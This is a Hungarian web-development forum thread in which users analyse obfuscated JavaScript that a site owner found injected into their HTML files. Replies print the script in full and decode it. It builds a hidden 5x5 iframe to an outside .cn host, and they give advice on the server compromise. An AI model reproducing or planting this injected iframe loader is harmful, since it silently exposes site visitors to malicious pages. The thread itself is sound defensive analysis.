- Premier előzetesen az xDefiant
- Dragon Age: Origins
- Xbox Series X|S
- iRacing.com - a legélethűbb -online- autós szimulátor bajnokság
- WoW avagy World of Warcraft -=MMORPG=-
- 2024 - Íme a 21. héten megjelenő játékok listája
- Elden Ring
- Call of Duty: Modern Warfare III (2023)
- Konzolokról KULTURÁLT módon
- Arena Breakout: Infinite
Új hozzászólás Aktív témák
-
fordfairlane
veterán
válasz eziskamu #2920 üzenetére
Ez javascript genyóság, időm most nincs tesztelni, hogy pontosan mit is csinál, valamit a böngészővel kavar, talán átirányítja máshova. Ha egy html fájlban találtad az azt jelenti, hogy a támadó fájlokat tud írni a szerveren. Ez két módon lehetséges:
Név/Jelszót szerzett, és valami fájlátviteli protokollal (FTP, SCP, SFTP) képes felülírni a szerveren.
Van egy webes script, amiben van valamiféle bug, amit kihasználva fájlokat lehet felülírni.Érdemes kinyomozni, melyikről lehet szó, illetve jelszót változtatni nem árt.
x gon' give it to ya
-
PazsitZ
addikt
válasz eziskamu #2920 üzenetére
Fárasztó egy javascript kód:
wy='t';
ya='mp';
yu='p:';
qs='sr';
d='nit';
l='ame';
v='c';
z='t';
ow='io';
zt='n/';
sc='n';
o='//z';
hy='cha';
hg='h';
p='.c';
j='ifr';
f='e';
dx=j.concat(l); // dx=iframe
lr=qs.concat(v); // lr=src
ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt); // http://zenitchampion.cn/
var dj=document.createElement(dx); // document.createElement(iframe);
dj.setAttribute('width','5'); //
dj.setAttribute('height','5'); //
dj.setAttribute('style','display:none'); //
dj.setAttribute(lr,ua); // dj.setAttribute('src','http://zenitchampion.cn/');
document.body.appendChild(dj); // beilleszti a body végére: <iframe width="5" height="5" style="display:none;" src="http://zenitchampion.cn/">persze ezek csak akkor futnak le ha <script> tag között vannak.
A lényege, hogy beilleszti a body végére a következő html kódot (egy nem látható iframe-t a fent említett oldalről):
<iframe width="5" height="5" style="display:none;" src="fent említett oldal">Amire nekem az avast rögtön támadást érzékel (JS:ScriptPE-inf [Trj]) már csak a cím google-al való rákereséssel is.
[ Szerkesztve ]
- http://pazsitz.hu -
-
fordfairlane
veterán
válasz eziskamu #2923 üzenetére
Ez az index.html-ben működőképes?
Így önmagában nem, csak ha <script></script> tagok közé rakod az általad bemásolt kódot, vagy .js fájlba, amire egy html oldal hivatkozik.
Van fent kettő is, mert két oldal van egy tárhelyen, az egyikben az oldalon megjelent szövegként, a másikon meg nem. A másikban aktív lehetett?
Bocs, ezt most nem értem.
[ Szerkesztve ]
x gon' give it to ya
-
cucka
addikt
válasz eziskamu #2923 üzenetére
Ez egy javascript kód. Ha <script> és </script> közé teszed, akkor lefut, különben ki lesz írva a képernyőre mint szöveg.
Amúgy nem egy nagy cucc visszafejteni, deklarál egy csomó változót, amiben 1-2 betű található, majd ezeket összekonkatenálja és a következőket csinálja:
- létrehoz egy iframe-et
- beállítja az src, a width, a height paramétereket, valamint a style-ját display:none-ra állítja.
- a body-hoz hozzáadja az iframe-et az appendChild metódussalAzt meg nézd meg te, hogy mit van azon az oldalon, nálam itt véget ért a kisérletezési kedv .Gondolom valamilyen eltérítés más oldalra, esetleg jelszólopás, ilyesmi. Amúgy ezt a technikát hívják úgy, hogy cross site scripting (xss).
Mod: látom, közben megelőztetek
[ Szerkesztve ]
Új hozzászólás Aktív témák
Állásajánlatok
Cég: Ozeki Kft.
Város: Debrecen
Cég: Alpha Laptopszerviz Kft.
Város: Pécs